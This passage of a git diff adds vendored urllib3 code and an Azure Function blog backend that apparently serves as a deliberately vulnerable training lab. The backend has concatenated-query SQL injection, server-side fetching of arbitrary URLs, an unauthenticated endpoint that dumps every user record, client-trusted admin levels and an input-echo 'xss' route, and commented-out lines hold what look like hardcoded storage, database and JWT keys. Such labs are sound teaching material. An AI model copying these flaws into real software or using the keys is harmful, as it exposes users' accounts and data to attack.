None: + url += path + if query is not None: + url += u"?" + query + if fragment is not None: + url += u"#" + fragment + + return url + + def __str__(self): + return self.url + + +def split_first(s, delims): + """ + .. deprecated:: 1.25 + + Given a string and an iterable of delimiters, split on the first found + delimiter. Return two split parts and the matched delimiter. + + If not found, then the first part is the full input string. + + Example:: + + >>> split_first('foo/bar?baz', '?/=') + ('foo', 'bar?baz', '/') + >>> split_first('foo/bar?baz', '123') + ('foo/bar?baz', '', None) + + Scales linearly with number of delims. Not ideal for large number of delims. + """ + min_idx = None + min_delim = None + for d in delims: + idx = s.find(d) + if idx < 0: + continue + + if min_idx is None or idx < min_idx: + min_idx = idx + min_delim = d + + if min_idx is None or min_idx < 0: + return s, "", None + + return s[:min_idx], s[min_idx + 1 :], min_delim + + +def _encode_invalid_chars(component, allowed_chars, encoding="utf-8"): + """Percent-encodes a URI component without reapplying + onto an already percent-encoded component. + """ + if component is None: + return component + + component = six.ensure_text(component) + + # Normalize existing percent-encoded bytes. + # Try to see if the component we're encoding is already percent-encoded + # so we can skip all '%' characters but still encode all others. + component, percent_encodings = PERCENT_RE.subn( + lambda match: match.group(0).upper(), component + ) + + uri_bytes = component.encode("utf-8", "surrogatepass") + is_percent_encoded = percent_encodings == uri_bytes.count(b"%") + encoded_component = bytearray() + + for i in range(0, len(uri_bytes)): + # Will return a single character bytestring on both Python 2 & 3 + byte = uri_bytes[i : i + 1] + byte_ord = ord(byte) + if (is_percent_encoded and byte == b"%") or ( + byte_ord < 128 and byte.decode() in allowed_chars + ): + encoded_component += byte + continue + encoded_component.extend(b"%" + (hex(byte_ord)[2:].encode().zfill(2).upper())) + + return encoded_component.decode(encoding) + + +def _remove_path_dot_segments(path): + # See http://tools.ietf.org/html/rfc3986#section-5.2.4 for pseudo-code + segments = path.split("/") # Turn the path into a list of segments + output = [] # Initialize the variable to use to store output + + for segment in segments: + # '.' 
is the current directory, so ignore it, it is superfluous + if segment == ".": + continue + # Anything other than '..', should be appended to the output + elif segment != "..": + output.append(segment) + # In this case segment == '..', if we can, we should pop the last + # element + elif output: + output.pop() + + # If the path starts with '/' and the output is empty or the first string + # is non-empty + if path.startswith("/") and (not output or output[0]): + output.insert(0, "") + + # If the path starts with '/.' or '/..' ensure we add one more empty + # string to add a trailing '/' + if path.endswith(("/.", "/..")): + output.append("") + + return "/".join(output) + + +def _normalize_host(host, scheme): + if host: + if isinstance(host, six.binary_type): + host = six.ensure_str(host) + + if scheme in NORMALIZABLE_SCHEMES: + is_ipv6 = IPV6_ADDRZ_RE.match(host) + if is_ipv6: + match = ZONE_ID_RE.search(host) + if match: + start, end = match.span(1) + zone_id = host[start:end] + + if zone_id.startswith("%25") and zone_id != "%25": + zone_id = zone_id[3:] + else: + zone_id = zone_id[1:] + zone_id = "%" + _encode_invalid_chars(zone_id, UNRESERVED_CHARS) + return host[:start].lower() + zone_id + host[end:] + else: + return host.lower() + elif not IPV4_RE.match(host): + return six.ensure_str( + b".".join([_idna_encode(label) for label in host.split(".")]) + ) + return host + + +def _idna_encode(name): + if name and any([ord(x) > 128 for x in name]): + try: + import idna + except ImportError: + six.raise_from( + LocationParseError("Unable to parse URL without the 'idna' module"), + None, + ) + try: + return idna.encode(name.lower(), strict=True, std3_rules=True) + except idna.IDNAError: + six.raise_from( + LocationParseError(u"Name '%s' is not a valid IDNA label" % name), None + ) + return name.lower().encode("ascii") + + +def _encode_target(target): + """Percent-encodes a request target so that there are no invalid characters""" + path, query = TARGET_RE.match(target).groups() + target = _encode_invalid_chars(path, PATH_CHARS) + query = _encode_invalid_chars(query, QUERY_CHARS) + if query is not None: + target += "?" + query + return target + + +def parse_url(url): + """ + Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is + performed to parse incomplete urls. Fields not provided will be None. + This parser is RFC 3986 compliant. + + The parser logic and helper functions are based heavily on + work done in the ``rfc3986`` module. + + :param str url: URL to parse into a :class:`.Url` namedtuple. + + Partly backwards-compatible with :mod:`urlparse`. + + Example:: + + >>> parse_url('http://google.com/mail/') + Url(scheme='http', host='google.com', port=None, path='/mail/', ...) + >>> parse_url('google.com:80') + Url(scheme=None, host='google.com', port=80, path=None, ...) + >>> parse_url('/foo?bar') + Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...) 
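+
+        One more illustrative case, combining a port, path, and query::
+
+            >>> parse_url('google.com:80/mail?q=1')
+            Url(scheme=None, host='google.com', port=80, path='/mail', query='q=1', ...)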
+ """ + if not url: + # Empty + return Url() + + source_url = url + if not SCHEME_RE.search(url): + url = "//" + url + + try: + scheme, authority, path, query, fragment = URI_RE.match(url).groups() + normalize_uri = scheme is None or scheme.lower() in NORMALIZABLE_SCHEMES + + if scheme: + scheme = scheme.lower() + + if authority: + auth, _, host_port = authority.rpartition("@") + auth = auth or None + host, port = _HOST_PORT_RE.match(host_port).groups() + if auth and normalize_uri: + auth = _encode_invalid_chars(auth, USERINFO_CHARS) + if port == "": + port = None + else: + auth, host, port = None, None, None + + if port is not None: + port = int(port) + if not (0 <= port <= 65535): + raise LocationParseError(url) + + host = _normalize_host(host, scheme) + + if normalize_uri and path: + path = _remove_path_dot_segments(path) + path = _encode_invalid_chars(path, PATH_CHARS) + if normalize_uri and query: + query = _encode_invalid_chars(query, QUERY_CHARS) + if normalize_uri and fragment: + fragment = _encode_invalid_chars(fragment, FRAGMENT_CHARS) + + except (ValueError, AttributeError): + return six.raise_from(LocationParseError(source_url), None) + + # For the sake of backwards compatibility we put empty + # string values for path if there are any defined values + # beyond the path in the URL. + # TODO: Remove this when we break backwards compatibility. + if not path: + if query is not None or fragment is not None: + path = "" + else: + path = None + + # Ensure that each part of the URL is a `str` for + # backwards compatibility. + if isinstance(url, six.text_type): + ensure_func = six.ensure_text + else: + ensure_func = six.ensure_str + + def ensure_type(x): + return x if x is None else ensure_func(x) + + return Url( + scheme=ensure_type(scheme), + auth=ensure_type(auth), + host=ensure_type(host), + port=port, + path=ensure_type(path), + query=ensure_type(query), + fragment=ensure_type(fragment), + ) + + +def get_host(url): + """ + Deprecated. Use :func:`parse_url` instead. + """ + p = parse_url(url) + return p.scheme or "http", p.hostname, p.port diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/wait.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/wait.py new file mode 100644 index 0000000..21b2780 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/wait.py @@ -0,0 +1,153 @@ +import errno +import select +import sys +from functools import partial + +try: + from time import monotonic +except ImportError: + from time import time as monotonic + +__all__ = ["NoWayToWaitForSocketError", "wait_for_read", "wait_for_write"] + + +class NoWayToWaitForSocketError(Exception): + pass + + +# How should we wait on sockets? +# +# There are two types of APIs you can use for waiting on sockets: the fancy +# modern stateful APIs like epoll/kqueue, and the older stateless APIs like +# select/poll. The stateful APIs are more efficient when you have a lots of +# sockets to keep track of, because you can set them up once and then use them +# lots of times. But we only ever want to wait on a single socket at a time +# and don't want to keep track of state, so the stateless APIs are actually +# more efficient. So we want to use select() or poll(). +# +# Now, how do we choose between select() and poll()? 
On traditional Unixes, +# select() has a strange calling convention that makes it slow, or fail +# altogether, for high-numbered file descriptors. The point of poll() is to fix +# that, so on Unixes, we prefer poll(). +# +# On Windows, there is no poll() (or at least Python doesn't provide a wrapper +# for it), but that's OK, because on Windows, select() doesn't have this +# strange calling convention; plain select() works fine. +# +# So: on Windows we use select(), and everywhere else we use poll(). We also +# fall back to select() in case poll() is somehow broken or missing. + +if sys.version_info >= (3, 5): + # Modern Python, that retries syscalls by default + def _retry_on_intr(fn, timeout): + return fn(timeout) + + +else: + # Old and broken Pythons. + def _retry_on_intr(fn, timeout): + if timeout is None: + deadline = float("inf") + else: + deadline = monotonic() + timeout + + while True: + try: + return fn(timeout) + # OSError for 3 <= pyver < 3.5, select.error for pyver <= 2.7 + except (OSError, select.error) as e: + # 'e.args[0]' incantation works for both OSError and select.error + if e.args[0] != errno.EINTR: + raise + else: + timeout = deadline - monotonic() + if timeout < 0: + timeout = 0 + if timeout == float("inf"): + timeout = None + continue + + +def select_wait_for_socket(sock, read=False, write=False, timeout=None): + if not read and not write: + raise RuntimeError("must specify at least one of read=True, write=True") + rcheck = [] + wcheck = [] + if read: + rcheck.append(sock) + if write: + wcheck.append(sock) + # When doing a non-blocking connect, most systems signal success by + # marking the socket writable. Windows, though, signals success by marked + # it as "exceptional". We paper over the difference by checking the write + # sockets for both conditions. (The stdlib selectors module does the same + # thing.) + fn = partial(select.select, rcheck, wcheck, wcheck) + rready, wready, xready = _retry_on_intr(fn, timeout) + return bool(rready or wready or xready) + + +def poll_wait_for_socket(sock, read=False, write=False, timeout=None): + if not read and not write: + raise RuntimeError("must specify at least one of read=True, write=True") + mask = 0 + if read: + mask |= select.POLLIN + if write: + mask |= select.POLLOUT + poll_obj = select.poll() + poll_obj.register(sock, mask) + + # For some reason, poll() takes timeout in milliseconds + def do_poll(t): + if t is not None: + t *= 1000 + return poll_obj.poll(t) + + return bool(_retry_on_intr(do_poll, timeout)) + + +def null_wait_for_socket(*args, **kwargs): + raise NoWayToWaitForSocketError("no select-equivalent available") + + +def _have_working_poll(): + # Apparently some systems have a select.poll that fails as soon as you try + # to use it, either due to strange configuration or broken monkeypatching + # from libraries like eventlet/greenlet. + try: + poll_obj = select.poll() + _retry_on_intr(poll_obj.poll, 0) + except (AttributeError, OSError): + return False + else: + return True + + +def wait_for_socket(*args, **kwargs): + # We delay choosing which implementation to use until the first time we're + # called. We could do it at import time, but then we might make the wrong + # decision if someone goes wild with monkeypatching select.poll after + # we're imported. + global wait_for_socket + if _have_working_poll(): + wait_for_socket = poll_wait_for_socket + elif hasattr(select, "select"): + wait_for_socket = select_wait_for_socket + else: # Platform-specific: Appengine. 
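+        # Callers normally go through the wait_for_read / wait_for_write
+        # wrappers defined below, e.g. (sketch):
+        #
+        #     if wait_for_read(sock, timeout=1.0):
+        #         data = sock.recv(4096)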
+ wait_for_socket = null_wait_for_socket + return wait_for_socket(*args, **kwargs) + + +def wait_for_read(sock, timeout=None): + """Waits for reading to be available on a given socket. + Returns True if the socket is readable, or False if the timeout expired. + """ + return wait_for_socket(sock, read=True, timeout=timeout) + + +def wait_for_write(sock, timeout=None): + """Waits for writing to be available on a given socket. + Returns True if the socket is readable, or False if the timeout expired. + """ + return wait_for_socket(sock, write=True, timeout=timeout) diff --git a/modules/module-1/resources/azure_function/data/app/__init__.py b/modules/module-1/resources/azure_function/data/app/__init__.py new file mode 100644 index 0000000..f4a0b9b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/app/__init__.py @@ -0,0 +1,837 @@ +import logging +import json +import traceback +import base64 +from datetime import datetime, timedelta +import urllib +import os +import bcrypt +import jwt +import azure.functions as func +from azure.cosmos import CosmosClient, PartitionKey +from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient +################## + +def generateResponse(statusCode, body): + headers = { + "Access-Control-Allow-Headers": "Content-Type", + "Access-Control-Allow-Origin": "*", + } + return func.HttpResponse( + body, + headers=headers, status_code=statusCode + ) + +def download_url(url): + req = urllib.request.Request(url, headers={"User-Agent": "Magic Browser"}) + image = urllib.request.urlopen(req).read() + return image + +#upload function here +def upload_file(img_data, container, url=None): + object_name = "images/" + datetime.utcnow().strftime("%Y%m%d%H%M%S%f") + ".png" + connect_string = os.environ['CON_STR'] + #connect_string = 'DefaultEndpointsProtocol=https;AccountName=blogapidataprjstg;AccountKey=lonXJiSzbilWwyQ/Ya+oqtCZucx2C0x2mNw81iRm+qGoz955Cy/Rc4GJu+W+YY7uXlMGETC+zbwP+AStUczL1g==;EndpointSuffix=core.windows.net' + blob = BlobClient.from_connection_string(conn_str=connect_string, container_name=container, blob_name=object_name) + file_b64 = "" + + if url == True: + file = download_url(img_data) + print(file) + else: + file = base64.b64decode(img_data) + try: + blob.upload_blob(file) + object_url = blob.url + return object_url + except Exception as e: + print(str(e)) + return "Please try with another image" + +def generate_auth(userInfo): + if userInfo is not None: + JWT_SECRET = os.environ['JWT_SECRET'] + # JWT_SECRET = "T2BYL6#]zc>Byuzu" + userInfo['exp'] = datetime.now() + timedelta(seconds=3600) + return jwt.encode(payload=userInfo, key=JWT_SECRET, algorithm='HS256') + else: + return None + +def auth_is_valid(req): + JWT_SECRET = '' + JWT_TOKEN = req.headers.get('JWT_TOKEN') or req.headers.get('jwt_token') + if JWT_TOKEN != '': + # JWT_TOKEN = event['headers']['JWT_TOKEN'] + JWT_SECRET = os.environ['JWT_SECRET'] + # JWT_SECRET = "T2BYL6#]zc>Byuzu" + try: + decode_token = jwt.decode( + JWT_TOKEN, JWT_SECRET, algorithms=['HS256']) + print("Token is still valid and active") + return True + except jwt.ExpiredSignatureError: + print("Token expired. 
Get new one") + return False + except jwt.InvalidTokenError as e: + print("Invalid Token") + return False + else: + print("returning false authentication") + return False + +def main(req: func.HttpRequest) -> func.HttpResponse: + + # params = req.params.get('value') + path = req.route_params.get("path") + method = req.method + try: + data = json.loads(req.get_body()) + except: + data = {} + + print(data) + logging.info(data) + responses = '' + userTable = 'blog-users' + postsTable = 'blog-posts' + + AZ_DB_ENDPOINT = os.environ['AZ_DB_ENDPOINT'] + # AZ_DB_ENDPOINT = 'https://ine-cosmos-db-other.documents.azure.com:443/' + AZ_DB_PRIMARYKEY = os.environ['AZ_DB_PRIMARYKEY'] + # AZ_DB_PRIMARYKEY = 'xO46Cch3ATvOqtU1h9kuyaqjer1rcG4bQBNwnQ0mhAlQzhWZ2lkU3ahyV0bKBu06wITmBwcJ40cjZKNAJQbZ8A==' + client = CosmosClient(AZ_DB_ENDPOINT, AZ_DB_PRIMARYKEY) + DATABASE_NAME = 'ine-cosmos-sql-db' + database = client.get_database_client(database=DATABASE_NAME) + user_container = database.get_container_client(userTable) + post_container = database.get_container_client(postsTable) + + if method == "POST" and path == "register": + new_user = {} + if "email" in data: + new_user["email"] = data["email"].lower().strip() + if "address" in data: + new_user["address"] = data["address"] + if "country" in data: + new_user["country"] = data["country"] + if "name" in data: + new_user["name"] = data["name"] + if "phone" in data: + new_user["phone"] = data["phone"] + if "secretQuestion" in data: + new_user["secretQuestion"] = data["secretQuestion"] + if "secretAnswer" in data: + new_user["secretAnswer"] = data["secretAnswer"] + if "creationDate" in data: + new_user["creationDate"] = data["creationDate"] + if "username" in data: + new_user["username"] = data["username"].lower().strip() + if "password" in data: + new_user["password"] = data["password"].encode('utf-8').strip() + + required_info = ["email", "username", "password", + "country", "secretQuestion", "secretAnswer"] + + for field in required_info: + if field not in new_user: + return generateResponse(200, "Fields required") + + new_user['authLevel'] = '300' + new_user['userStatus'] = 'active' + #azure + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + response = list(user_container.query_items(**params)) + # response = dbUserTable.scan() + logging.info(response) + items = response + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(new_user["email"])}], + 'enable_cross_partition_query': True + } + check_user_email = list(user_container.query_items(**params)) + logging.info(check_user_email) + if 'Item' in check_user_email: + responses = "User with email already exists. 
Please choose a different email address" + return generateResponse(200, json.dumps({"body": responses})) + + new_user["id"] = str(len(items)+1) + logging.info("id is") + logging.info(new_user["id"]) + new_user["password"] = bcrypt.hashpw( + new_user["password"], bcrypt.gensalt(rounds=10)).decode('utf-8') + # logging.info("password is") + # logging.info(new_user["password"]) + # logging.info(new_user) + user_container.upsert_item(new_user) + responses = "User Registered" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "login": + user_email = data['email'] + user_password = data['password'] + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": user_email}], + 'enable_cross_partition_query': True + } + db_user = list(user_container.query_items(**params)) + # db_user = dbUserTable.get_item(Key={"email": new_user["email"]})#azure + # if(len(db_user)>0): + # db_user = { + # "Item":db_user + # } + logging.info("new user is") + logging.info(db_user) + + # if 'Item' not in db_user: + # responses = "User with email "+user_email+" not found" + # return generateResponse(200, json.dumps({"body": responses})) + + if user_email != db_user[0]['email']: + responses = "User with email "+user_email+" not found" + return generateResponse(200, json.dumps({"body": responses})) + if db_user[0]['userStatus'] == "banned": + responses = "User is banned. Please contact your administrator" + return generateResponse(200, json.dumps({"body": responses})) + if not bcrypt.checkpw((user_password).encode('utf-8'), (db_user[0]['password']).encode('utf-8')): + responses = "Incorrect Password!!" + return generateResponse(200, json.dumps({"body": responses})) + + userInfo = { + 'id': db_user[0]['id'], + 'email': db_user[0]['email'], + 'name': db_user[0]['name'], + 'authLevel': db_user[0]['authLevel'], + 'address': db_user[0]['address'], + 'country': db_user[0]['country'], + 'phone': db_user[0]['phone'], + 'secretQuestion': db_user[0]['secretQuestion'], + 'secretAnswer': db_user[0]['secretAnswer'], + 'username': db_user[0]['username'], + 'admin': 'johndoe@gmail.com' + } + gen_token = generate_auth(userInfo) + responses = { + 'user': userInfo, + 'token': (gen_token).decode('utf-8') + } + logging.info(responses) + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "reset-password": + if 'email' not in data or 'secretQuestion' not in data or 'secretAnswer' not in data or 'password' not in data: + responses="All fields are required" + return generateResponse(200, json.dumps({"body": responses})) + + email=data['email'].lower().strip() + secretQuestion=data['secretQuestion'] + secretAnswer=data['secretAnswer'] + newPassword=data['password'] + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(email)}], + 'enable_cross_partition_query': True + } + user_data = list(user_container.query_items(**params)) + + if user_data[0]['secretQuestion'] != secretQuestion or user_data[0]['secretAnswer'] != secretAnswer: + responses="Secret question or key doesn't match" + return generateResponse(200, json.dumps({"body": responses})) + + encryptedPW = bcrypt.hashpw((newPassword).encode('utf-8'), bcrypt.gensalt(rounds=10)) + + for item in user_data: + if item['email'] == email: + new_item = item + new_item['password'] = (encryptedPW).decode('utf-8') + update_response = user_container.replace_item(item, new_item) + break + + 
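+        # replace_item overwrites the stored Cosmos DB document with
+        # new_item; only the bcrypt-hashed password differs from the
+        # original record.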
responses = "Password changed successfully" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "dump": + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + postItems = list(post_container.query_items(**params)) + + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + userItems = list(user_container.query_items(**params)) + responses=userItems+postItems + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "list-posts": + try: + data = json.loads(req.get_body()) + except: + data = None + if data is None: + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + items = list(post_container.query_items(**params)) + for item in items: + if item['postStatus'] != 'approved': + items.remove(item) + for item in items: + if item['postStatus'] != 'approved': + items.remove(item) + return generateResponse(200, json.dumps({"body": items})) + + authLevel=data['authLevel'] + postStatus=data['postStatus'] + email= data['email'] + + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + items = list(post_container.query_items(**params)) + + # postStatus - > accepted, rejected, pending, all + responses=[] + if authLevel=='0' or authLevel=='100': + if postStatus!='all': + for i in range(len(items)): + item=items[i] + if item['postStatus'] == postStatus: + responses.append(item) + else: + for i in range(len(items)): + item=items[i] + responses.append(item) + else: + if postStatus!='all': + for i in range(len(items)): + item=items[i] + if item['postStatus'] == postStatus and item['email']==email: + responses.append(item) + else: + for i in range(len(items)): + item=items[i] + if item['email']==email: + responses.append(item) + + print(len(items)) + print(len(responses)) + return generateResponse(200, json.dumps({"body": responses})) + + if auth_is_valid(req): + + if method == "POST" and path == "change-password": + id = data['id'].strip() + + if 'newPassword' not in data or 'confirmNewPassword' not in data: + responses = 'New password & Confirm new password are mandatory' + return generateResponse(200, json.dumps({"body": responses})) + + newPassword = data['newPassword'].strip() + confirmNewPassword = data['confirmNewPassword'].strip() + + if (newPassword != confirmNewPassword): + responses = 'New password & Confirm new password must match' + return generateResponse(200, json.dumps({"body": responses})) + + # db_data = dbUserTable.scan()#azure + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + db_data = list(user_container.query_items(**params)) + + for item in db_data: + if item['id'] == id: + email=item['email'] + break + + encryptedPW = bcrypt.hashpw((newPassword).encode('utf-8'), bcrypt.gensalt(rounds=10)) + + for item in db_data: + if item['id'] == id: + new_item = item + new_item['password'] = (encryptedPW).decode('utf-8') + update_response = user_container.replace_item(item, new_item) + break + + responses = { + 'email': email, + 'newPassword': newPassword, + 'message': "Password changed successfully", + 'authLevel': db_data[0]['authLevel'], + 'country': db_data[0]['country'], + 'id': id, + 'phone': db_data[0]['phone'], + 'username': db_data[0]['username'], + 'userStatus': db_data[0]['userStatus'] + } + return generateResponse(200, json.dumps({"body": responses})) + + + + elif method == "POST" and path == "ban-user": + if 'name' not in data 
or 'authLevel' not in data or 'email' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + name = data['name'] + authLevel = data['authLevel'] + email = data['email'] + + if authLevel != '0': + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(email)}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + if 'email' not in check_user[0]: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + if check_user[0]['userStatus'] == 'banned': + responses = "User already banned" + return generateResponse(200, json.dumps({"body": responses})) + else: + for item in check_user: + if item['email'] == email: + new_item = item + new_item['userStatus'] = 'banned' + update_response = user_container.replace_item(item, new_item) + break + responses = "User "+email+" Banned" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "unban-user": + if 'name' not in data or 'authLevel' not in data or 'email' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + name = data['name'] + authLevel = data['authLevel'] + email = data['email'] + + if authLevel != '0': + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(email)}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + + if 'email' not in check_user[0]: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + if check_user[0]['userStatus'] != 'banned': + responses = "User already Unbanned" + return generateResponse(200, json.dumps({"body": responses})) + else: + for item in check_user: + if item['email'] == email: + new_item = item + new_item['userStatus'] = 'active' + update_response = user_container.replace_item(item, new_item) + break + responses = "User "+email+" Unbanned" + return generateResponse(200, json.dumps({"body": responses})) + + + elif method == "POST" and path == "xss": + responses = data['scriptValue'] + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "save-post": + new_post = {} + if "postTitle" in data: + new_post["postTitle"] = data["postTitle"] + if "authorName" in data: + new_post["authorName"] = data["authorName"] + if "postingDate" in data: + new_post["postingDate"] = data["postingDate"] + if "email" in data: + new_post["email"] = data["email"] + if "postContent" in data: + new_post["postContent"] = data["postContent"] + if "getRequestImageData" in data: + new_post["getRequestImageData"] = data["getRequestImageData"] + + + required_info = ["postTitle", "authorName", "postingDate", + "email", "postContent", "getRequestImageData"] + + for field in required_info: + if field not in new_post: + return generateResponse(200, "Fields required") + + new_post['postStatus'] = 'pending' + + params = { + 'query': 'SELECT * FROM c ', + 'enable_cross_partition_query': True + } + items = list(post_container.query_items(**params)) + + new_post['id'] = 
str(len(items)+1) + + post_container.upsert_item(new_post) + + responses = "Post Added" + return generateResponse(200, json.dumps({"body": responses})) + + elif path == "save-content": + container = os.environ['CONTAINER_NAME'] + if method == "POST": + try: + img_data = json.loads(req.get_body()) + except: + img_data = {} + # print(img_data) + responses = upload_file(img_data['value'], container) + print(responses) + return generateResponse(200, json.dumps({"body": responses})) + # Decode base64 and upload to storage account container + + elif method == "GET": + # Download from url as base64 and upload to storage account container + try: + img_data = req.params.get('value') + except: + img_data = '' + + # print(img_data) + responses = upload_file(img_data, container, True) + return generateResponse(200, json.dumps({"body": responses})) + else: + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "search-author": + + name = data["value"] + authLevel = data['authLevel'] + + if authLevel == '300': + exec_statement="SELECT * FROM c where c.name = " + "'"+name+"'" + "and c.authLevel in ('300','200')" + elif authLevel == '200': + exec_statement="SELECT * FROM c where c.name =" + "'"+name+"'" + "and c.authLevel in ('300','200','100')" + elif authLevel == '100': + exec_statement="SELECT * FROM c where c.name = " + "'"+name+"'" +"and c.authLevel in ('300','200','100')" + else: + exec_statement="SELECT * FROM c where c.name = " + "'"+name+"'" + logging.info(exec_statement) + params = { + 'query': exec_statement, + 'enable_cross_partition_query': True + } + responses = list(user_container.query_items(**params)) + + if len(responses) > 0: + for item in responses: + item['password'] = '' + item["secretAnswer"] = "" + item["secretQuestion"] = "" + + print("Response ", responses) + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "get-users": + # client = boto3.client("dynamodb") + # data = json.loads(event["body"]) + logging.info(data) + authLevel = data['authLevel'] + + if authLevel == '300': + exec_statement="SELECT * FROM c where c.authLevel in ('300','200')" + elif authLevel == '200': + exec_statement="SELECT * FROM c where c.authLevel in ('300','200','100')" + elif authLevel == '100': + exec_statement="SELECT * FROM c where c.authLevel in ('300','200','100')" + else: + exec_statement='SELECT * FROM c' + + params = { + 'query': exec_statement, + 'enable_cross_partition_query': True + } + responses = list(user_container.query_items(**params)) + + # if responses != {}: + # responses[0]['password'] = '' + if len(responses) > 0: + for item in responses: + item['password'] = '' + item["secretAnswer"] = "" + item["secretQuestion"] = "" + print("Response ", responses) + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "delete-user": + + if 'authLevel' not in data or 'email' not in data: + responses = "Something is missing. 
Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + authLevel = data['authLevel'] + email = data['email'] + + if authLevel != '0': + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + + # check_user = dbUserTable.get_item(Key={"email": email}) + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": email}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + + if len(check_user) < 1: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + + # delete_response = dbUserTable.delete_item(Key={'email': email,}) + delete_response = user_container.delete_item(check_user[0], partition_key=check_user[0]['id']) + + responses = "User "+email+" deleted" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "change-auth": + if 'authLevel' not in data or 'email' not in data or 'userAuthLevel' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + authLevel = data['authLevel'] + email = data['email'] + userAuthLevel =data['userAuthLevel'].strip() + + if authLevel != "0": + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + + if userAuthLevel == 'Reassign as Admin': + userAuthLevel = '0' + elif userAuthLevel == 'Reassign as Author': + userAuthLevel = '200' + elif userAuthLevel == 'Reassign as Editor': + userAuthLevel = '100' + else: + userAuthLevel = '300' + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": email}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + + if len(check_user) < 1: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + for item in check_user: + if item['email'] == email: + new_item = item + new_item['authLevel'] = userAuthLevel + update_response = user_container.replace_item(item, new_item) + break + responses = "User "+email+" AuthLevel Updated" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "user-details-modal": + + email = data['email'] + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": email}], + 'enable_cross_partition_query': True + } + + responses = list(post_container.query_items(**params)) + + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "modify-post-status": + + if 'authLevel' not in data or 'postStatus' not in data or 'id' not in data: + responses = "Something is missing. 
Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + authLevel = data['authLevel'] + id = data['id'] + postStatus =data['postStatus'].lower().strip() + + if not (authLevel == '0' or authLevel =='100'): + responses = "Requires Admin or Editor" + return generateResponse(200, json.dumps({"body": responses})) + + # check_post = dbPostTable.get_item(Key={"id": id}) + params = { + 'query': 'SELECT * FROM c WHERE c.id = @id', + 'parameters': [{"name": "@id", "value": id}], + 'enable_cross_partition_query': True + } + check_post = list(post_container.query_items(**params)) + + if len(check_post)<1: + responses = "Post does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + for item in check_post: + if item['id'] == id: + new_item = item + new_item['postStatus'] = postStatus + update_response = post_container.replace_item(item, new_item) + break + + responses = "Post "+id+" status Updated" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "change-profile": + new_user_data = {} + if "email" in data: + new_user_data["email"] = data["email"].lower().strip() + if "address" in data: + new_user_data["address"] = data["address"] + if "country" in data: + new_user_data["country"] = data["country"] + if "name" in data: + new_user_data["name"] = data["name"] + if "phone" in data: + new_user_data["phone"] = data["phone"] + if "secretQuestion" in data: + new_user_data["secretQuestion"] = data["secretQuestion"] + if "secretAnswer" in data: + new_user_data["secretAnswer"] = data["secretAnswer"] + if "username" in data: + new_user_data["username"] = data["username"].lower().strip() + + required_info = ["email", "address","name","phone", "username", + "country", "secretQuestion", "secretAnswer"] + + for field in required_info: + if field not in new_user_data: + return generateResponse(200, json.dumps({"body": "All Fields required"})) + + new_user_data['userStatus'] = 'active' + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": new_user_data["email"]}], + 